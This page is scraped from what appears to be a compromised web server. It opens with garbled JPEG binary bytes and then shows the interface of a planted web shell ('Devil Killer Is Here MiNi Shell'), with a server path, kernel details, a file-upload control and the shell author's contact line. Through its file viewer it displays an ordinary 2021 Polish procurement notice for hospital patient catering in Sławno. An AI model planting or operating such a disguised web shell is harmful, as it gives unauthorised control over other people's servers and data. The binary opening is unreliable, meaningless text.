JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009245701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00092457 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przygotowanie oraz dostawa całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Sławnie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Powiatowy w Sławnie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 331308664</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">I-go Pułku Ułanów</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sławno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">59 810 30 31</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">59 810 24 23</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ola.ostapkiewicz@szpital-slawno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.szpital-slawno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przygotowanie oraz dostawa całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Sławnie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0831ed48-d4b9-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00092457</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006753/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Przygotowanie oraz dostawa całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Sławnie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.szpital-slawno.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/,ePUAPu https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>korespondencjielektronicznejprzekazywanej przy ich użyciu, opisane zostały w Regulaminie<br/>korzystania z miniPortaludostępnympod adresem https://miniportal.uzp.gov.pl/Instrukcje oraz<br/>Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie art. 13 ust 1 i 2<br/>RozporządzenieParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r.. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE ( Dz. Urz. UE L 119 z 04.05.2016 r. )<br/>zwanym dalej RODO,informujęże:• Administratorem Pani/Pana danych osobowych jest Szpital<br/>Powiatowy w Sławnie zsiedzibą przyul. I-go Pułku Ułanów 9, 76-100 Sławno;• Inspektorem ochrony<br/>danych osobowych wSzpitaluPowiatowym w Sławnie jest Pani Aneta Jasińska, kontakt:<br/>naczelna@szpital-slawno.pl, Tel 59810 6321• Pani /Pana dane osobowe przetwarzane będą na podstawie art. 6 ust 1 lit.. c RODO wceluzwiązanym z powyższym postępowaniem o udzielenie<br/>zamówienia publicznego;• OdbiorcamiPani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostaniedokumentacjapostępowania w oparciu o art. 8 oraz art. 96 ust 3 ustawy z dnia<br/>29 stycznia 2004r.Prawozamówieńpublicznych ( Dz. U. z 2017r. poz. 1579 i 2018) dalej ustawa PZP;•<br/>Pani/ Pana dane osobowe będąprzechowywane , zgodnie z art. 97 ust 1 ustawy PZP przez okres 4 lat<br/>od dniazakończeniapostępowania o udzielenie zamówienia , a jeżeli czas trwania umowy przekracza<br/>4lata,okres przechowywania obejmuje cały czas trwania umowy;• Obowiązek podania przez<br/>Panią/Panadanychosobowych bezpośrednio Pani/ Pana dotyczących jest wymogiem ustawowym<br/>określonymwprzepisach ustawy PZP, związanych z udziałem w postępowaniu o<br/>udzieleniezamówieniapublicznego, konsekwencje niepodania określonych danych wynikają z ustawy<br/>PZP;• Wodniesieniu doPani/ Pana danych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany, stosowniedo art. 22 RODO• Posiada Pani/ Pan:- na podstawie art. 15<br/>RODO prawodostępu do danychosobowych Pani/ Pana dotyczących;- na podstawie art. 16 RODO<br/>prawo dosprostowania Pani/ Panadanych osobowych;- na podstawie art. 18 RODO prawo żądania<br/>odadministratora ograniczeniaprzetwarzania danych osobowych z zastrzeżeniem przypadków, o<br/>którychmowa w art. 18 ust 2RODO;- prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>DanychOsobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/ Pana<br/>dotyczącychnarusza przepisy RODO;• Nieprzysługuje Pani/ Panu:- w związku z art. 17 ust 3 lit b, d lub<br/>e RODOprawo do usunięcia danychosobowych;- prawo do przenoszenia danych osobowych, o którym<br/>mowa wart. 20 RODO;Napodstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych,gdyż podstawaprawna przetwarzana Pani/ Pana danych osobowych jest art. 6 ust 1 lit c<br/>RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:− w związku z art. 17 ust.<br/>3lit.b,d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia<br/>danychosobowych,októrym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo<br/>sprzeciwu,wobecprzetwarzaniadanych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana<br/>danychosobowychjest art. 6 ust.1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/11/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przygotowanie oraz dostawa całodziennego wyżywienia dla pacjentów Szpitala Powiatowego w Sławnie.<br/>2.	Przedstawione ilości w Załączniku Nr 2 (Formularz cenowy) są ilościami szacunkowymi.<br/>3.	Zamawiający zastrzega, że odległość kuchni, gdzie przygotowywane będą posiłki od siedziby Zamawiającego nie może przekroczyć 30 km. <br/>4.	Zamawiający zastrzega sobie prawo do niezrealizowania umowy w pełnym zakresie. <br/>5.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>6.	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>7.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych zadań dotyczących zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-08-01 do 2022-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione za pomocą systemu punktowego</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:1) nie podlegają wykluczeniu;2) spełniają warunki udziału w postępowaniu dotyczące:a) zdolności do<br/>występowania w obrocie gospodarczymZamawiający nie określił warunku w tym zakresie.b)<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to<br/>z odrębnych przepisów:Warunek zostanie spełniony posiadaniem:• aktualnego wpisu do rejestru<br/>zakładów podlegających urzędowej kontroli organów Państwowej Inspekcji Sanitarnej;• decyzji<br/>właściwego organu Inspekcji Sanitarnej potwierdzającej spełnianie wymagań koniecznych do<br/>prowadzenia zakładu żywienia zbiorowego z uwzględnieniem świadczenia usług dla klientów<br/>zewnętrznych;• opinii właściwego organu Inspekcji Sanitarnej dotyczącej spełnienia wymogów<br/>sanitarnych przy przewozie posiłków;• wdrożonego systemu HACCP.c) sytuacji ekonomicznej<br/>lub finansowej: Warunek zostanie spełniony posiadaniem ubezpieczenia od odpowiedzialności<br/>cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem<br/>zamówienia na kwotę 250.000,00 PLN. (słownie: dwieście pięćdziesiąt tysięcy złotych)<br/>Zamawiający wymaga również, aby przez cały okres realizacji umowy Wykonawca posiadał<br/>ważną umowę ubezpieczenia od odpowiedzialności cywilnej, w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia.d) zdolności technicznej lub<br/>zawodowej:Wykonawca wykaże, że w ciągu ostatnich 2 lat wykonał, a w przypadku świadczeń<br/>okresowych lub ciągłych wykonuje usługi polegające na przygotowaniu i dostawie posiłków w<br/>systemie cateringowym o wartości co najmniej 250.000,00 PLN brutto, (słownie: dwieście<br/>pięćdziesiąt tysięcy złotych) w skali jednego roku.Warunek zdolności technicznej zostanie<br/>spełniony posiadaniem:• środków transportu, wykorzystywanych do realizacji zamówienia<br/>posiadających zaświadczenia, dopuszczające te środki do przewozu żywności, wydane przez<br/>odpowiednie służby sanitarno-epidemiologiczne wraz z informacją o podstawie dysponowania<br/>tymi środkami;• wózków transportowych do przewozu posiłków – wózki zamknięte posiadające<br/>wszelkie wymagane atesty i dopuszczenia, odpowiadające aktualnym zasadom systemu<br/>HACCP;• termosów i pojemników GN do dostarczania posiłków w dobrym stanie technicznym i<br/>higienicznym posiadające wszelkie wymagane atesty i dopuszczenia, odpowiadające aktualnym<br/>zasadom systemu HACCP;• pojemników na odpady pokonsumpcyjne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o<br/>działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu<br/>potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) decyzję właściwego organu Inspekcji Sanitarnej potwierdzającą spełnianie wymagań koniecznych<br/>do prowadzenia zakładu żywienia zbiorowego z uwzględnieniem świadczenia usług dla klientów<br/>zewnętrznych;b) wykaz środków transportu przeznaczonych do realizacji zamówienia wraz z<br/>informacjami o podstawie do dysponowania tymi środkami (wg wzoru stanowiącego załącznik nr 7 do<br/>SIWZ);c) opinie właściwego organu Inspekcji Sanitarnej potwierdzające, że środki transportu,<br/>wykorzystywane do realizacji zamówienia spełniają wymogi sanitarne przy przewozie posiłków; d)<br/>wykaz narzędzi, wyposażenia i urządzeń technicznych dostępnych Wykonawcy, w celu wykonania<br/>zamówienia, szczególnie w zakresie środków transportu, wózków transportowych do przewozu<br/>posiłków, termosów i pojemników GN, pojemniki na odpady pokonsumpcyjne, pojemniki na zużyte<br/>naczynia jednorazowe (wg wzoru stanowiącego załącznik nr 7 do SIWZ);e) certyfikat systemu HACCP<br/>lub oświadczenie potwierdzające stosowanie zasad HACCP;f) wykaz osób, które będą uczestniczyć w<br/>wykonaniu zamówienia łącznie z kierowcą transportującego posiłki wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (wg wzoru stanowiącego załącznik nr 6 do SIWZ); (O każdej zmianie osobowej Wykonawca<br/>będzie informował Zamawiającego, najpóźniej na dzień przed rozpoczęciem pracy przez nowego<br/>pracownika.); Wykonawca musi spełniać wymogi zatrudnienia na podstawie umowy o pracę osób<br/>wykonujących przedmiot zamówienia (art.29 ust. 3a Ustawy Pzp). g) wykaz wykonanych w ciągu<br/>ostatnich 2 lat, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych<br/>usług o wartości, co najmniej 250.000,00 zł. brutto (słownie: dwieście pięćdziesiąt tysięcy złotych) w<br/>skali jednego roku wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz<br/>których usługi zostały wykonane oraz załączeniem dowodów, czy usługi te zostały wykonane lub są<br/>wykonywane należycie (wg wzoru stanowiącego Załącznik nr 8 do SIWZ); h) polisę lub inny dokument<br/>potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na minimalną kwotę 250.000,00 PLN (słownie: dwieście pięćdziesiąt tysięcy złotych.)</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Pełnomocnictwo dla pełnomocnika do reprezentowania w<br/>postępowaniuWykonawcówwspólnieubiegających się o udzielenie zamówienia - dotyczy ofert<br/>składanychprzezWykonawcówwspólnie ubiegających się o udzielenie<br/>zamówienia.OświadczenieWykonawcy oniepodleganiuwykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu lubkryteriów selekcji wzakresiewskazanym przez Zmawiającego w SWZ<br/>- wzór oświadczeniastanowi Załącznik nr 3 doSWZ.W przypadku wspólnego ubiegania się o<br/>zamówienie przezWykonawców, oświadczenieskładakażdy z Wykonawców.Wykonawcy<br/>wspólnie ubiegający się oudzielenie zamówienia dołączajądo oferty oświadczenie, z którego<br/>wynika, które dostawywykonają poszczególniwykonawcyzgodnie z art. 117 ust. 4 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-31</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com